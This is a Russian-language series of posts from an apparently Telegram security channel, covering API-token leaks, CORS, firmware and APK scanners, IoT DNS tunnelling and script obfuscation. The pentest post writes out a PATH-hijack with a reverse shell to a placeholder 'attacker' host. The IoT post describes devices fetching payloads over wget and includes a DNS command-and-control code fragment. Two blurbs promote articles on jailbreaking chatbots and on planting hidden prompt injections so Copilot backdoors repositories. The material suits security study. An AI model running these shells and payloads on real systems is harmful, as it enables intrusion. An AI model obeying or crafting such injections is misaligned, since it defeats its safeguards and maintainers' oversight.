API-токены: как один ключ может открыть вообще всё

👋 Приветствую в мире цифровой безопасности!

Сегодня кратко о том, как один забытый ключ может превратить сервис в открытый буфер для хакеров.

⏺К сути: часто разрабы оставляют API-токены прямо в коде или .env-файлах. Казалось бы, мелочь, но сканеры вроде truffleHog и Gitleaks ищут их на GitHub и других репозиториях. Один успешный поиск, и кто-то уже в вашем облаке, с доступом к базам и сервисам.

⏺Ищем токены первыми:

git log -p | grep -i "api_key"

или с помощью

truffleHog --repo https://github.com/your/repo

⏺Ротация ключей: меняем токены регулярно, чтобы даже найденный ключ быстро терял ценность.

⏺Минимальные права: токен получает только те возможности, которые реально нужны.

aws iam create-policy --policy-name ReadOnlyPolicy ...

⏺Хранилища секретов: Vault, Infisical, Secrets Manager - чтобы токены не болтались в коде. И не забываем про Pre-commit hooks. Смотрим каждый коммит локально, прежде чем пушить в репозиторий.

gitleaks detect --source . --branch=main

ZeroDay | #безопасность

CORS: блокировка кросс-домена

👋 Приветствую в мире цифровой безопасности!

Поговорим про CORS. Такой механизм, который браузеры используют, чтобы защищать пользователя от «чужого кода».

⏺CORS (Cross-Origin Resource Sharing) нужен, чтобы сайты не могли тайно читать данные с других доменов. Например, вы зашли на bank.com, а потом открыли evil.com — без CORS JavaScript на evil.com мог бы запросить /api/account и прочитать ваши куки. Плохая идея, верно?

⏺Как на деле: простые GET/POST запросы браузер пропускает, но читать ответ не даст без заголовков Access-Control-Allow-Origin. Сложные запросы (PUT, DELETE, кастомные заголовки) сначала проходят preflight-запрос OPTIONS. Сервер должен подтвердить, типо: «Да, фронтенд с этого домена может использовать эти методы и заголовки».

Access-Control-Allow-Origin: https://frontend.com
Access-Control-Allow-Methods: POST, DELETE
Access-Control-Allow-Headers: Content-Type, Authorization

⏺Пример для Express.js:

app.use((req, res, next) => {
  res.setHeader('Access-Control-Allow-Origin', 'https://frontend.com');
  res.setHeader('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE');
  res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');
  res.setHeader('Access-Control-Allow-Credentials', 'true');
  next();
});

⏺Советы на практике: никогда не давайте * для защищённых данных, проверяйте preflight OPTIONS для сложных запросов, ограничивайте куки и токены доверенными доменами, а кэширование preflight-запросов через Access-Control-Max-Age снизит нагрузку.

⏺Типичные косяки: забыли заголовки - ответ блокируется; использовали * с куки - это тоже ошибка. Не настроили OPTIONS? Ну тогда сложный запрос не проходит.

ZeroDay | #безопасность

📝 Вспомним протоколы безопасности

ZeroDay | #ИБ

Джейлбрейкаем чатботы: ChatGPT без фильтров

У чатботов есть встроенные «поручни безопасности» - guardrails, которые не дают им выходить за рамки дозволенного. Но что если эти ограничения мешают работе? Тут поможет джейлбрейк: от ролевых сценариев до визуальных инъекций, позволяющих обойти ограничения и заставить ИИ отвечать, как нужно вам.

⏺В статье разбирают, как работают джейлбрейки, какие техники до сих пор живы (спойлер: не всё закрыто), и почему умение ломать guardrails не только про «серые зоны», но и про аудит безопасности, а также честный доступ к инфе.

ZeroDay | #Статья

EMBA: инструмент для анализа прошивок

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺EMBA - это open-source утилита, которая берёт firmware и вытаскивает из неё всё подозрительное: от hardcoded-паролей и дырявых бинарников до древних библиотек и кривых скриптов.

⏺Зачем: прошивки - на деле, один из любимых векторов атак. Роутеры, камеры, умные колонки - всё это часто забывают обновлять. А значит, без инструментов вроде EMBA вы рискуете проглядеть дыру, через которую к вам залезут хакеры.

⏺Что умеет: да кучу всего. Делает статический и динамический анализ (с эмуляцией), генерацию SBOM (списка компонентов), проверку конфигов и библиотек, плюс хороший веб-отчёт, который можно сразу показывать разрабам или прикладывать к пентесту.

⏺Быстро стартуем (Linux, нужен Docker):

git clone https://github.com/e-m-b-a/emba.git
cd emba
sudo ./installer.sh -d

Прогон прошивки через дефолтный профиль:

sudo ./emba -l ~/log -f ~/firmware -p ./scan-profiles/default-scan.emba

Нужен SBOM?

sudo ./emba -l ~/log -f ~/firmware -p ./scan-profiles/default-sbom.emba

ZeroDay | #Инструмент

🎉 Результаты розыгрыша:

🏆 Победители:
1. Eugene (@jenigen)
2. $.7&& (@k0st0vk7)
3. Banana✨ (@solncelunaoblako)
4. ㅤ
5. Dmitry (@Enk0d)
6. Sergey (@Ref1leqq)
7. Nodar (@x0ff_deus)
8. mikhail (@ownnickname)
9. -A (@id9912345)
10. ki.real (@iamTRC20)
11. Екатерина (@catkozh)
12. Zefir (@ivansamsia)
13. ΝᎬϴᎷᎪᏀᎬ (@neo_mage)
14. Мухит
15. Vladislav (@darkh4mster)
16. 朴贊郁 (@flokiauther)
17. mad_peleng (@mad_peleng)
18. ᅠ
19. Владислав (@Watatamin)
20. 🍃 (@haltdiekIappe)
21. Сергей (@lanikhinSergei)
22. Andrei (@a_vasiukou)
23. Nikita (@heliotropelovethesun)
24. kimawashi (@romant1ca_com)
25. S (@SNSN_2023)

✔️Проверить результаты

Тот, кто знал слишком много: история Хьё Минь Нго

👋 Приветствую в мире цифровой безопасности!

Расскажу об обычном парне из Вьетнама, который стал случайно владеть базой данных в 200 млн.

⏺Первые шаги: подросток из маленького вьетнамского городка просто хотел обойти лимиты dial-up и сидеть в инете бесплатно. Кончилось всё, как обычно, долгом для семьи и ссылкой к дяде «на перевоспитание». Там он наткнулся на хакерский форум и понял, что впереди много всего интересного.

⏺От баловства к деньгам: сначала были надписи «Pwned by Hieu.pc» на сайтах. Потом - кредитки и обналичка через онлайн-покер. Доходы теперь шли в тысячи долларов в день. Чтобы ускорить поток, он написал свой сканер SQL-инъекций и штамповал данные пачками.

⏺Большая игра: однажды ему подсказали - кредитки слишком заметны, а персональные данные стоят куда дороже. Он смог получить доступ к базе из 200 млн записей через контракт с Court Ventures. На своём сайте продавал поиск всего за $1, при себестоимости $0,14. В лучшие месяцы доходил до $120 000.

⏺Падение: в 2012 Court Ventures купила Experian, и слишком активный «частный детектив из Сингапура» привлёк внимание агентов. Его заманили в Гуам и арестовали. Обвинения тянули на 45 лет, но сделка с правосудием сократила срок до 13, из которых он отсидел 7.

⏺Новая глава: после освобождения в 2020 он вернулся во Вьетнам уже другим человеком. Теперь помогает ловить киберпреступников, консультирует жертв мошенников и читает лекции.

ZeroDay | #безопасность

3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте.

⏺Быстрый поиск SUID и возможностей root: Не ограничивайтесьfind / -perm -4000. Используйте getcap -r / 2>/dev/null — это покажет бинарники с Linux capabilities. Например:

/usr/bin/python3 = cap_setuid+ep

Ну вот, у тебя по факту вышел шелл с root-привилегиями без эксплойтов.

⏺Подмена скриптов через PATH: Если есть доступ к конфигам или cron, проверьте абсолютные пути команд. Можно подменить PATH и добавить свои скрипты:

echo "/tmp" > /etc/cron.d/fakelist
echo -e '#!/bin/bash\nnc attacker 4444 -e /bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH

⏺SSH через прокси для MITM: Когда цель доступна по SSH, а нужен MITM, удобно юзать ProxyCommand:

Host target
    ProxyCommand ncat --proxy attacker_ip:1080 --proxy-type socks5 %h %p

ZeroDay | #пентест

📝 Какие файрволы бывают?

ZeroDay | #firewall

Охотимся на Copilot 😏 Учебная промпт-инъекция для пентестеров

GitHub Copilot умеет автоматически писать код по задачам. Казалось бы, удобно и безопасно. Но если задача публичная и её назначают Copilot, появляется скрытый вектор атаки: промпт-инъекция. Текст задачи может незаметно подсунуть инструкции, из-за которых агент добавит «нычку» в репозиторий.

⏺В статье поясняют, как устроена такая промпт-инъекция: как спрятать вредоносный текст от глаза мейнтейнера, как Copilot воспринимает контекст, и как формируются прям надежные эксплойты с низким риском обнаружения.

ZeroDay | #Статья

APKHunt: анализ Android-приложений

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺APKHunt - статический анализатор APK, заточенный под стандарты OWASP MASVS. Он сканирует безопасность хранения данных, работу с криптографией, использование разрешений и даже наличие отладочных функций.

⏺Что классного: умеет сканировать сразу несколько APK, формирует лёгкие TXT-отчёты и поддерживает CI/CD-интеграцию. Так что его можно встроить прямо в пайплайн, чтобы каждый билд проходил проверку на автомате.

⏺Кому пригодится: ну разрабам - чтобы не выпускать дырявые релизы, пентестерам, конечно - для ускорения аудита, а архитекторам - для контроля соблюдения стандартов безопасности.

⏺Как потестить самому:

git clone https://github.com/Cyber-Buddy/APKHunt.git
cd APKHunt
go run apkhunt.go -p app.apk -l

ZeroDay | #Инструмент

IoT и DNS-туннели: как закрепляются атакующие

👋 Приветствую в мире цифровой безопасности!

Сегодня посмотрим, как хакеры юзают IoT-устройства для входа в сеть и закрепляются через DNS-туннели.

⏺Как ломают:
1️⃣Сначала ищут потенциальные цели через открытые источники (ripe.net, passive DNS) и сканят сеть с помощью masscan или Angry IP Scanner.
2️⃣Находят уязвимый роутер, L3-коммутатор или камеру и запускают routersploit autopwn - перебор эксплойтов и брутфорс.
3️⃣Дальше небольшой трюк: скомпрометированное устройство тянет пейлоад с VPS через встроенный wget и запускает его. Архитектуры любые: ARM, x86, MIPS и т.д.
4️⃣Готово - IoT превращается в точку входа внутрь сети, через которую можно прокинуть SOCKS proxy и атаковать уже корпоративный сегмент.

⏺В чем плюсы: на IoT нет антивирусов и EDR, системные вызовы никто не мониторит, логи не собирают. А значит, команда exec проходит беспрепятственно.

⏺Где появляется DNS-туннелирование: даже если сеть сегментирована и фильтруется, малварь может «стучаться» на C2-панель через Do53/DoT/DoH, пряча команды в битах DNS-заголовков. Да, ответ на условный ls может идти сутки, но для хакера то главное - это закрепление в сети.

Пример из PoC:

unsigned short __do53_query(char *_qname, __do53_type _qtype, unsigned char *_wire)
{
  _wire[0] = // Вот здесь пейлоад
  _wire[1] = // Вот здесь пейлоад
  _wire[2] = 0x01;
  _wire[3] = 0x00;
  _wire[4] = 0x00;
  _wire[5] = 0x01;
  _wire[6] = 0x00;
  _wire[7] = 0x00;
  _wire[8] = 0x00;
  _wire[9] = 0x00;
  _wire[10] = 0x00;
  _wire[11] = 0x00;
 
  int query_lenght = __ascii_convertation_to_wire(_qname, &(_wire[12]));
  int nextLoc = 12 + query_lenght + 1;
 
  _wire[nextLoc] = 0x00;
  _wire[++nextLoc] = 0x01;
  _wire[++nextLoc] = 0x00;
  _wire[++nextLoc] = 0x01;
 
  return nextLoc + 1;
}

⏺В итоге у нас подломленное устройство раз в час резолвит «невинный» домен вроде metrics-cisco.com и получает команды в Additional-/Authority-секциях. Для NTA-систем это выглядит просто как обычный DNS-запрос.

ZeroDay | #IoT

Шифруем скрипты

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как шифровать скрипты.

⏺Очень часто заказчики получают готовый продукт, но хотят защитить исходный код bash или Python-скриптов. Простая компиляция не помогает.

⏺Как решить: Obash - это обфускатор и шифратор скриптов, который превращает их в исполняемые бинарники с AES-256 шифрованием и аппаратной привязкой.

⏺Ключ и вектор инициализации берутся с железа, а не хардкодятся в бинарнике, что делает невозможным запуск скрипта на чужой машине. Даже если кто-то получит бинарь и посмотрит память или процессы, исходники не увидит.

⏺Как его использовать:

git clone https://github.com/louigi600/obash.git
cd obash/
sudo apt install libssl-dev
make
./obash testme

⏺Привязка к железу: для работы шифрования Obash берёт UUID и Serial устройства. Если рут-доступа нет, можно сделать локальные файлы:

sudo cat /sys/devices/virtual/dmi/id/product_uuid > product_uuid
sudo cat /sys/devices/virtual/dmi/id/product_serial > product_serial

И заменить пути в interpreter.c и obfuscated_bash.c:

char prod_uuid[256]="./product_uuid";
char prod_serial[256]="./product_serial";

⏺Что происходит внутри: Obash шифрует скрипт AES-256, кодирует его в Base64, создаёт промежуточный C-файл (interpreter.c) с функциями интерпретации и компилирует бинарник. Сюда входят и ключи, и вектор, и шифротекст. Бинарник запускается только на целевой машине.

⏺Вот пример тестового скрипта:

#!/bin/bash
echo "my pid is: $$"
echo $0
echo $*
read -p "enter something ... " A
echo $A
sleep 10 &
ps -ef | grep $$
ps -ef | grep $!
sleep 2

В следующем посте будем анализировать шифрованные скрипты

ZeroDay | #скрипты